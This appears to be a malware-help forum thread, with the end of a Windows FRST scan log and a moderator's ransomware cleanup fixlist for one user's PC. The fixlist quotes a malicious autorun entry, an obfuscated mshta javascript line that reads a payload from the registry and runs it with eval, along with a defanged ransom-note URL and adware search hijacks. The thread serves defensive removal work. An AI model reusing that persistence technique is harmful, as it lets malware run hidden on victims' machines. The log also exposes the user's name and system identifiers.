AlternateDataStreams: C:\ProgramData\Temp:FA09FC72
AlternateDataStreams: C:\ProgramData\Temp:FD786DCA
AlternateDataStreams: C:\ProgramData\Temp:FF9C44FE

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2813116197-4237973809-2954861823-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\christopher lane\AppData\Roaming\Microsoft\Internet Explorer\Internet Explorer Wallpaper.bmp
DNS Servers: 192.168.0.1 - 205.171.2.25
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [{8FDDC85C-B901-4F07-B6A3-C77621EA50B1}] => (Allow) C:\Windows\system32\rundll32.exe
FirewallRules: [{175F33F5-CF39-45CA-B5C4-C7ED70EE05AC}] => (Allow) C:\Windows\explorer.exe
FirewallRules: [UDP Query User{1144049B-2A35-4764-8678-934ED85CD024}C:\program files (x86)\divx\divx media server\divxmediaserver.exe] => (Allow) C:\program files (x86)\divx\divx media server\divxmediaserver.exe
FirewallRules: [TCP Query User{19183B7A-223B-4CC9-B81C-7091AF65FC36}C:\program files (x86)\divx\divx media server\divxmediaserver.exe] => (Allow) C:\program files (x86)\divx\divx media server\divxmediaserver.exe
FirewallRules: [{85C722BF-4310-429C-8926-86786DF876AA}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
FirewallRules: [{7DB5BCAF-D80F-4435-818F-B84EAEA777D3}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [UDP Query User{BBA9CF89-9342-4E3A-8117-D2B8C8B6D666}C:\users\christopher lane\appdata\local\temp\7zsd29a.tmp\trnt_egg.exe] => (Block) C:\users\christopher lane\appdata\local\temp\7zsd29a.tmp\trnt_egg.exe
FirewallRules: [TCP Query User{AD2D31B0-4DA9-4F48-A9E4-CEC04C4805BA}C:\users\christopher lane\appdata\local\temp\7zsd29a.tmp\trnt_egg.exe] => (Block) C:\users\christopher lane\appdata\local\temp\7zsd29a.tmp\trnt_egg.exe
FirewallRules: [{E6DB8A35-6F24-42A3-9595-289E24526974}] => (Allow) LPort=31931
FirewallRules: [{EA321C51-AE86-48E4-BDB0-A8EB8CC80180}] => (Allow) LPort=14714
FirewallRules: [{0DCB97E5-3816-4D4A-9B41-A3BDC9A471E8}] => (Allow) LPort=12972
FirewallRules: [{30EBC899-F578-4316-93A5-9E68D51C77E6}] => (Allow) C:\Program Files (x86)\Audials\Audials 12\Audials.exe
FirewallRules: [UDP Query User{98C27ED9-BAF4-427F-9943-1237105E90D2}C:\program files (x86)\wondershare\video converter ultimate\dscheck.exe] => (Allow) C:\program files (x86)\wondershare\video converter ultimate\dscheck.exe
FirewallRules: [TCP Query User{8F472EFB-83B3-4B0D-BCFD-7982E8A1E68F}C:\program files (x86)\wondershare\video converter ultimate\dscheck.exe] => (Allow) C:\program files (x86)\wondershare\video converter ultimate\dscheck.exe
FirewallRules: [UDP Query User{40DD5C84-7D2B-45E5-93A1-9EB86F2A3183}C:\program files (x86)\bittorrent\bittorrent.exe] => (Allow) C:\program files (x86)\bittorrent\bittorrent.exe
FirewallRules: [TCP Query User{A1D427E2-7E9B-4EF0-92A3-05123979E42B}C:\program files (x86)\bittorrent\bittorrent.exe] => (Allow) C:\program files (x86)\bittorrent\bittorrent.exe
FirewallRules: [{F845C123-209B-4D6E-894F-32D545E25D82}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3715\Agent.exe
FirewallRules: [{D894140D-5B5D-44FB-917A-EA84217C5133}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3715\Agent.exe
FirewallRules: [{856FEC24-57D5-4A09-A895-E7EBEA5B42E4}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3689\Agent.exe
FirewallRules: [{D2875A59-51BF-4AA9-A9F9-61265E60B640}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3689\Agent.exe
FirewallRules: [{45347F32-EF86-49CE-AE07-7418186D4CF7}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3688\Agent.exe
FirewallRules: [{0A6FC79D-6E13-4CEA-9D71-192C5F0F085C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3688\Agent.exe
FirewallRules: [{BEFDF456-1364-4C23-9619-DC489CA38B8C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3669\Agent.exe
FirewallRules: [{68B202ED-9F48-4CBC-9F86-143B6E0801A4}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3669\Agent.exe
FirewallRules: [{B00F8D73-C2D8-4A1A-B4DF-B6A2DDB13BC5}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3634\Agent.exe
FirewallRules: [{38ABCB19-E25F-4CFC-9FEE-16AADDED3C83}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3634\Agent.exe
FirewallRules: [{AE5EA4AB-1187-4A6D-860B-9EE716729800}] => (Allow) C:\Program Files (x86)\Diablo III\Diablo III.exe
FirewallRules: [{E568711F-0895-4B33-A257-A15D488030EB}] => (Allow) C:\Program Files (x86)\Diablo III\Diablo III.exe
FirewallRules: [{3FF5C35B-6615-40B4-A9DD-8B81C0F8F010}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{8BE8D669-E247-40F3-BD5A-F751CDA806A8}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{969D80B4-9713-48D3-AC2D-54B748EEF09F}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
FirewallRules: [{FB4B6A5F-78E5-4F93-B72B-FE116902D293}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
FirewallRules: [{83F1A20B-DBAB-4B2A-82AA-D57556CB9578}] => (Allow) C:\Users\christopher lane\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{14B600F1-365F-4DCE-94E7-B751B99BA85E}] => (Allow) C:\Users\christopher lane\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [UDP Query User{5E9FCB19-7848-45A8-8D6B-8C5421AE82AB}C:\users\christopher lane\appdata\roaming\torntv.com\torntv downloader.exe] => (Allow) C:\users\christopher lane\appdata\roaming\torntv.com\torntv downloader.exe
FirewallRules: [TCP Query User{11335625-6AF4-4944-BEDE-D275E09A91A4}C:\users\christopher lane\appdata\roaming\torntv.com\torntv downloader.exe] => (Allow) C:\users\christopher lane\appdata\roaming\torntv.com\torntv downloader.exe
FirewallRules: [{143B0212-73BF-4FD5-B863-224B19EA2D56}] => (Allow) C:\Program Files (x86)\AVG\AVG2014\avgemca.exe
FirewallRules: [{05018CF0-ACB2-4157-AF29-1D947A5AC717}] => (Allow) C:\Program Files (x86)\AVG\AVG2014\avgemca.exe
FirewallRules: [{49452371-7B8D-45C9-8F2C-3F46B4C75B55}] => (Allow) C:\Program Files (x86)\AVG\AVG2014\avgdiagex.exe
FirewallRules: [{4C5B3617-12C9-45BA-94B8-871EB5417144}] => (Allow) C:\Program Files (x86)\AVG\AVG2014\avgdiagex.exe
FirewallRules: [{58F8BACD-603F-40A9-AD10-7EC3B34A6C65}] => (Allow) C:\Program Files (x86)\AVG\AVG2014\avgnsa.exe
FirewallRules: [{4906B38C-7C58-418A-9AF0-DA468556F55F}] => (Allow) C:\Program Files (x86)\AVG\AVG2014\avgnsa.exe
FirewallRules: [{785B65F8-CE31-4DA6-8D28-35909CC4B629}] => (Allow) C:\Users\christopher lane\AppData\Local\Facebook\Video\Skype\FacebookVideoCalling.exe
FirewallRules: [UDP Query User{BF4DF646-6A6B-4C0F-876D-1AD6FFDA4C4C}C:\program files (x86)\firefly studios\stronghold 2\stronghold2.exe] => (Block) C:\program files (x86)\firefly studios\stronghold 2\stronghold2.exe
FirewallRules: [TCP Query User{38E67AC6-E175-400A-8768-962828A7D6B9}C:\program files (x86)\firefly studios\stronghold 2\stronghold2.exe] => (Block) C:\program files (x86)\firefly studios\stronghold 2\stronghold2.exe
FirewallRules: [{F744A59D-5CAC-4D86-A865-9184864C3260}] => (Allow) C:\Program Files (x86)\AVG\AVG2014\avgmfapx.exe
FirewallRules: [{1793EB65-BE3C-4E62-AB06-9EBB8DCA6D28}] => (Allow) C:\Program Files (x86)\AVG\AVG2014\avgmfapx.exe
FirewallRules: [UDP Query User{C3196D10-3A5E-4596-B852-A32226EDD906}C:\program files (x86)\tango\tango.exe] => (Allow) C:\program files (x86)\tango\tango.exe
FirewallRules: [TCP Query User{C8605EC5-58DA-4851-92FC-0CAD01875E30}C:\program files (x86)\tango\tango.exe] => (Allow) C:\program files (x86)\tango\tango.exe
FirewallRules: [{726274F4-063C-472E-A09F-649C190462AD}] => (Allow) C:\Program Files (x86)\Tango\Tango.exe
FirewallRules: [{B74A8C93-8713-4600-B300-37CA750362B7}] => (Allow) C:\Program Files (x86)\Tango\Tango.exe
FirewallRules: [{6963A423-DB3C-4A30-A941-1FC39626825E}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe
FirewallRules: [{5B560006-B411-4C39-91D3-5D72B487D201}] => (Allow) C:\Program Files (x86)\AVG\AVG2013\avgmfapx.exe
FirewallRules: [{B8EF71ED-24CD-40E4-A22E-7BD6FB71EBCB}] => (Allow) C:\Program Files (x86)\AVG\AVG2013\avgmfapx.exe
FirewallRules: [{09878063-1533-41F3-B2D0-51D28EE5BCBB}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [UDP Query User{D6403B97-1889-4F5E-B4C5-7885A0888B97}C:\program files\hp\hp envy 100 d410 series\bin\hpnetworkcommunicator.exe] => (Allow) C:\program files\hp\hp envy 100 d410 series\bin\hpnetworkcommunicator.exe
FirewallRules: [TCP Query User{1DE02DF1-4285-41AB-9E15-C8D6F57959C5}C:\program files\hp\hp envy 100 d410 series\bin\hpnetworkcommunicator.exe] => (Allow) C:\program files\hp\hp envy 100 d410 series\bin\hpnetworkcommunicator.exe
FirewallRules: [{526FB693-A213-4C78-9220-B4CB12304336}] => (Allow) C:\Program Files (x86)\Intel Corporation\Intel WiDi\WiDiApp.exe
FirewallRules: [{BA12CA55-32CD-4F6A-AD18-5D787ACD1822}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{1D5F39B5-3369-4A6A-B03E-FF32F2B04BE4}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{539754B3-0CFB-4AB9-89EC-BE280F5CFB64}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{A1A55856-A43A-493A-B9BB-10C41A0DD912}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [UDP Query User{422B4365-25DF-484E-9A24-F7EB2801DE65}C:\windows\splwow64.exe] => (Allow) C:\windows\splwow64.exe
FirewallRules: [TCP Query User{5266BF2C-4FA6-4219-B2AE-21B6E1661FCE}C:\windows\splwow64.exe] => (Allow) C:\windows\splwow64.exe
FirewallRules: [{DB83FBFC-B368-4E0C-A115-AAD28C8BDF48}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{9C739EDF-B304-4BBC-8211-4DDE33723639}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe
FirewallRules: [{EFC822CC-E639-4FCE-BDD9-45130563B44F}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{92A74957-4C22-4B59-9298-D4B26E136E66}] => (Allow) LPort=1900
FirewallRules: [{1FE6C373-2D6F-4A99-B97A-514CB501E1B2}] => (Allow) LPort=2869
FirewallRules: [{0DAFDA73-72C8-4182-9BA9-4C843C7976C0}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{893CC9E2-3B45-4FD6-8E06-C6A57C433953}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\MediaSmart\RoxioNow\RNow.exe
FirewallRules: [{122A3EEB-C842-49DD-9CAE-A581A2F460DF}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\MediaSmart\RoxioNow\RNow.exe
FirewallRules: [{67FAADF0-9859-46CF-9FB3-B901DF8AD6A7}] => (Allow) C:\Program Files (x86)\Roxio\RoxioNow Player\RNowShell.exe
FirewallRules: [{36375CC7-09C8-4CBD-933B-B5468D1AF99E}] => (Allow) C:\Program Files (x86)\Roxio\RoxioNow Player\RNowShell.exe
FirewallRules: [{31E1AFD5-369D-4580-A645-9CDB7C2F9AA0}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
FirewallRules: [{31BB0C60-0553-45B8-9D90-0A2173BBEB2B}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (10/16/2015 08:47:05 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: christopherlane)
Description: Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (10/16/2015 08:46:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: mediasrv.exe, version: 1.0.0.49, time stamp: 0x4d382309
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0xaddcf4a9
Faulting process id: 0x1c84
Faulting application start time: 0xmediasrv.exe0
Faulting application path: mediasrv.exe1
Faulting module path: mediasrv.exe2
Report Id: mediasrv.exe3
Faulting package full name: mediasrv.exe4
Faulting package-relative application ID: mediasrv.exe5

Error: (10/16/2015 08:46:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: obexsrv.exe, version: 1.0.0.49, time stamp: 0x4d3823ba
Faulting module name: obexsrv.exe, version: 1.0.0.49, time stamp: 0x4d3823ba
Exception code: 0xc0000005
Fault offset: 0x00055bee
Faulting process id: 0x1c1c
Faulting application start time: 0xobexsrv.exe0
Faulting application path: obexsrv.exe1
Faulting module path: obexsrv.exe2
Report Id: obexsrv.exe3
Faulting package full name: obexsrv.exe4
Faulting package-relative application ID: obexsrv.exe5

Error: (10/16/2015 08:46:36 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: devmonsrv.exe, version: 1.0.0.49, time stamp: 0x4d38243e
Faulting module name: devmonsrv.exe, version: 1.0.0.49, time stamp: 0x4d38243e
Exception code: 0xc0000005
Fault offset: 0x00040ebc
Faulting process id: 0x1ca8
Faulting application start time: 0xdevmonsrv.exe0
Faulting application path: devmonsrv.exe1
Faulting module path: devmonsrv.exe2
Report Id: devmonsrv.exe3
Faulting package full name: devmonsrv.exe4
Faulting package-relative application ID: devmonsrv.exe5

Error: (10/16/2015 08:45:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: devmonsrv.exe, version: 1.0.0.49, time stamp: 0x4d38243e
Faulting module name: devmonsrv.exe, version: 1.0.0.49, time stamp: 0x4d38243e
Exception code: 0xc0000005
Fault offset: 0x00040ebc
Faulting process id: 0x844
Faulting application start time: 0xdevmonsrv.exe0
Faulting application path: devmonsrv.exe1
Faulting module path: devmonsrv.exe2
Report Id: devmonsrv.exe3
Faulting package full name: devmonsrv.exe4
Faulting package-relative application ID: devmonsrv.exe5

Error: (10/16/2015 08:45:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: obexsrv.exe, version: 1.0.0.49, time stamp: 0x4d3823ba
Faulting module name: obexsrv.exe, version: 1.0.0.49, time stamp: 0x4d3823ba
Exception code: 0xc0000005
Fault offset: 0x00055bee
Faulting process id: 0x660
Faulting application start time: 0xobexsrv.exe0
Faulting application path: obexsrv.exe1
Faulting module path: obexsrv.exe2
Report Id: obexsrv.exe3
Faulting package full name: obexsrv.exe4
Faulting package-relative application ID: obexsrv.exe5

Error: (10/16/2015 08:39:56 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: mediasrv.exe, version: 1.0.0.49, time stamp: 0x4d382309
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0xebf81cee
Faulting process id: 0x3be8
Faulting application start time: 0xmediasrv.exe0
Faulting application path: mediasrv.exe1
Faulting module path: mediasrv.exe2
Report Id: mediasrv.exe3
Faulting package full name: mediasrv.exe4
Faulting package-relative application ID: mediasrv.exe5

Error: (10/16/2015 08:39:56 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: obexsrv.exe, version: 1.0.0.49, time stamp: 0x4d3823ba
Faulting module name: obexsrv.exe, version: 1.0.0.49, time stamp: 0x4d3823ba
Exception code: 0xc0000005
Fault offset: 0x00055bee
Faulting process id: 0x1218
Faulting application start time: 0xobexsrv.exe0
Faulting application path: obexsrv.exe1
Faulting module path: obexsrv.exe2
Report Id: obexsrv.exe3
Faulting package full name: obexsrv.exe4
Faulting package-relative application ID: obexsrv.exe5

Error: (10/16/2015 08:39:54 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: devmonsrv.exe, version: 1.0.0.49, time stamp: 0x4d38243e
Faulting module name: devmonsrv.exe, version: 1.0.0.49, time stamp: 0x4d38243e
Exception code: 0xc0000005
Fault offset: 0x00040ebc
Faulting process id: 0x390c
Faulting application start time: 0xdevmonsrv.exe0
Faulting application path: devmonsrv.exe1
Faulting module path: devmonsrv.exe2
Report Id: devmonsrv.exe3
Faulting package full name: devmonsrv.exe4
Faulting package-relative application ID: devmonsrv.exe5

Error: (10/16/2015 08:08:36 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 73527016

System errors:
=============
Error: (10/16/2015 08:49:21 PM) (Source: DCOM) (EventID: 10010) (User: christopherlane)
Description: App.AppX65n3t4j73ch7cremsjxn7q8bph1ma8jw.mca

Error: (10/16/2015 08:47:49 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)UnavailableUnavailable

Error: (10/16/2015 08:46:49 PM) (Source: DCOM) (EventID: 10005) (User: christopherlane)
Description: 1053Bluetooth Media ServiceUnavailable{9AC233E9-AC75-4DB5-85C4-DAB13A484FEA}

Error: (10/16/2015 08:46:49 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Bluetooth Media Service service failed to start due to the following error:
%%1053

Error: (10/16/2015 08:46:49 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Bluetooth Media Service service to connect.

Error: (10/16/2015 08:46:49 PM) (Source: DCOM) (EventID: 10005) (User: christopherlane)
Description: 1053Bluetooth OBEX ServiceUnavailable{E9E0D51D-F407-4D91-B294-C111F721A3AF}

Error: (10/16/2015 08:46:49 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Bluetooth OBEX Service service failed to start due to the following error:
%%1053

Error: (10/16/2015 08:46:48 PM) (Source: DCOM) (EventID: 10005) (User: christopherlane)
Description: 1053Bluetooth Device MonitorUnavailable{DABF28BE-F6B4-4E40-8F40-C4FB26F3116C}

Error: (10/16/2015 08:46:47 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Bluetooth Device Monitor service failed to start due to the following error:
%%1053

CodeIntegrity:
===================================
Date: 2015-10-16 20:54:18.914
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2015-10-16 20:54:18.896
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2015-10-16 20:52:36.923
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2015-10-16 20:52:36.910
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2015-10-16 20:52:36.896
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2015-10-16 20:52:36.874
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2015-10-16 20:52:36.861
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2015-10-16 20:52:36.847
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2015-10-16 20:52:36.821
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2015-10-16 20:52:36.808
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

==================== Memory info ===========================

Processor: Intel® Core™ i5-2410M CPU @ 2.30GHz
Percentage of memory in use: 39%
Total physical RAM: 6091.86 MB
Available physical RAM: 3705.3 MB
Total Virtual: 12235.86 MB
Available Virtual: 9719.32 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:680.98 GB) (Free:507.82 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (RECOVERY) (Fixed) (Total:17.36 GB) (Free:1.88 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive e: (NicoleChriswed1) (CDROM) (Total:0.65 GB) (Free:0 GB) CDFS
Drive f: (HP_TOOLS) (Fixed) (Total:0.1 GB) (Free:0.08 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 698.6 GB) (Disk ID: D5226363)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=681 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=17.4 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=103 MB) - (Type=0C)

==================== End of Addition.txt ============================ :smashcomp:

#2
Essexboy

Posted 17 October 2015 - 04:50 AM

GeekU Moderator

Retired Staff
69,964 posts

Hi there I am afraid you have lost your pictures unless you have a backup... Was Dropbox and Onedrive connected when you were infected ? As they may also be encrypted

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:

CreateRestorePoint:
HKU\S-1-5-21-2813116197-4237973809-2954861823-1001\...\Run: [**3a481ddf<*>] => mshta javascript:VlYJXEep7="T8Cu";D8x=new%20ActiveXObject("WScript.Shell");AgIrdfF0m2="h";p89Lfc=D8x.RegRead("HKCU\\software\\ea1aa6391a\\3e2c454b");oifU8dLk="F2qvU";eval(p89Lfc);VOGYg5TQ="IRLd5nFSS"; <===== ATTENTION (Value Name with invalid characters)
Startup: C:\Users\christopher lane\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.PNG [2015-10-14] ()
Startup: C:\Users\christopher lane\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.TXT [2015-10-14] ()
InternetURL: C:\Users\christopher lane\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.URL -> hxxp://ayh2m57ruxjtwyd5.speralreaopio.com/gj5hz1
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
HKU\S-1-5-21-2813116197-4237973809-2954861823-1001\Software\Microsoft\Internet Explorer\Main,Start Page Restore = hxxp://search.conduit.com?SearchSource=10&ctid=CT3106777
SearchScopes: HKLM -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPNTDF
SearchScopes: HKLM-x32 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPNTDF
SearchScopes: HKLM-x32 -> {56256A51-B582-467e-B8D4-7786EDA79AE0} URL = hxxp://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=ZLxdm003X9US&ptb=4zVlkGdB22iQ7Ly.Q20SrQ&ind=2011120921&ptnrS=ZLxdm003X9US&si=CJquq7vA9qwCFYUZQgodWBSCTQ&n=77df4519&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-2813116197-4237973809-2954861823-1001 -> {00C175EC-DD0C-4F1D-B35F-A9B33687C9D1} URL = hxxp://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3106777
SearchScopes: HKU\S-1-5-21-2813116197-4237973809-2954861823-1001 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPNTDF
SearchScopes: HKU\S-1-5-21-2813116197-4237973809-2954861823-1001 -> {56256A51-B582-467e-B8D4-7786EDA79AE0} URL = hxxp://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=ZLxdm003X9US&ptb=4zVlkGdB22iQ7Ly.Q20SrQ&ind=2011120921&ptnrS=ZLxdm003X9US&si=CJquq7vA9qwCFYUZQgodWBSCTQ&n=77df4519&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-2813116197-4237973809-2954861823-1001 -> {7F3A2942-97B7-4B56-8A97-E27D0835A2C8} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=ANT&o=102821&src=kw&q={searchTerms}&locale=en_US&apn_ptnrs=4N&apn_dtid=YYYYYYSNUS&apn_uid=2267b6ae-c106-43fb-b375-48fbc6d4b7ae&apn_sauid=BFB5573C-50EB-40B2-A331-C4D1F36EEBA5&
SearchScopes: HKU\S-1-5-21-2813116197-4237973809-2954861823-1001 -> {BB82DE59-BC4C-4172-9AC4-73315F71CFFE} URL = hxxp://websearch.searchtotal.info/?l=1&q={searchTerms}&pid=24423&r=2015/05/28&hid=5027782828486197179&lg=EN&cc=US&unqvl=88
SearchScopes: HKU\S-1-5-21-2813116197-4237973809-2954861823-1001 -> {CD1105A4-F86F-48E6-B6A9-67694343E2F6} URL = hxxp://searchou.com/?q={searchTerms}&id=0afce1ea0000000000002c413808d294&r=255
Toolbar: HKU\S-1-5-21-2813116197-4237973809-2954861823-1001 -> No Name - {50FAFAF0-70A9-419D-A109-FA4B4FFD4E37} - No File
Toolbar: HKU\S-1-5-21-2813116197-4237973809-2954861823-1001 -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files (x86)\AVG\AVG2012\avgpp.dll No File
S1 kzgqwavs; \??\C:\WINDOWS\system32\drivers\kzgqwavs.sys [X]
S1 ubuqhhia; \??\C:\WINDOWS\system32\drivers\ubuqhhia.sys [X]
S1 lrvcraza; C:\Windows\system32\drivers\lrvcraza.sys [55168 2015-10-08] (Microsoft Corporation)
C:\WINDOWS\system32\drivers\kzgqwavs.sys
C:\WINDOWS\system32\drivers\ubuqhhia.sys
